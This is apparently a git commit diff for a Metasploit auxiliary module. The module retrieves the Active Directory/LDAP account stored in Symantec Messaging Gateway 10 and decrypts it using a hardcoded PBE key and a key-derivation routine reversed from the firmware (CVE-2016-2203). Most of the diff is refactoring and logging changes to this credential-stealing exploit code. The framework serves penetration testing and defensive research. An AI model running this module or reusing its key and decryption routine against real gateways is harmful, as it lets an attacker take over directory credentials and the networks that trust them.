added modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb
parent
dc3a185519
commit
c322a4b314
|
@ -9,7 +9,7 @@ require 'digest'
|
|||
require "openssl"
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
@ -19,18 +19,19 @@ class Metasploit3 < Msf::Auxiliary
|
|||
super(update_info(info,
|
||||
'Name' => 'Symantec Messaging Gateway 10 LDAP Creds Graber',
|
||||
'Description' => %q{
|
||||
This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key. Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account.
|
||||
This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key. Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account. Version 10.6.0-7 and earlier are affected
|
||||
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
'https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00',
|
||||
'CVE-2016-2203'
|
||||
['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
|
||||
['CVE','2016-2203'],
|
||||
['BID','86137']
|
||||
],
|
||||
|
||||
'Author' =>
|
||||
[
|
||||
'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
|
||||
'zirsalem'
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -51,6 +52,19 @@ class Metasploit3 < Msf::Auxiliary
|
|||
deregister_options('RHOST')
|
||||
end
|
||||
|
||||
|
||||
def print_status(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def print_good(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def print_error(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def report_cred(opts)
|
||||
service_data = {
|
||||
address: opts[:ip],
|
||||
|
@ -126,22 +140,29 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return sid, last_login
|
||||
end
|
||||
|
||||
# Returns the status of the listening port.
|
||||
#
|
||||
# @return [Boolean] TrueClass if port open, otherwise FalseClass.
|
||||
|
||||
def port_open?
|
||||
begin
|
||||
res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT'])
|
||||
return true if res
|
||||
rescue ::Rex::ConnectionRefused
|
||||
vprint_status("#{peer} - Connection refused")
|
||||
print_status("#{peer} - Connection refused")
|
||||
return false
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{peer} - Connection failed")
|
||||
print_error("#{peer} - Connection failed")
|
||||
return false
|
||||
rescue ::OpenSSL::SSL::SSLError
|
||||
vprint_error("#{peer} - SSL/TLS connection error")
|
||||
print_error("#{peer} - SSL/TLS connection error")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
# Returns the derived key from the password, the salt and the iteration count number.
|
||||
#
|
||||
# @return Array of byte containing the derived key.
|
||||
def get_derived_key(password, salt, count)
|
||||
key = password + salt
|
||||
for i in 0..count-1
|
||||
|
@ -152,7 +173,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
|
||||
# @Return the deciphered password
|
||||
# Algorithm obtained by reversing the firmware
|
||||
#
|
||||
def decrypt(enc_str)
|
||||
pbe_key="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-="
|
||||
salt = (Base64.strict_decode64(enc_str[0,12]))
|
||||
|
|
Loading…
Reference in New Issue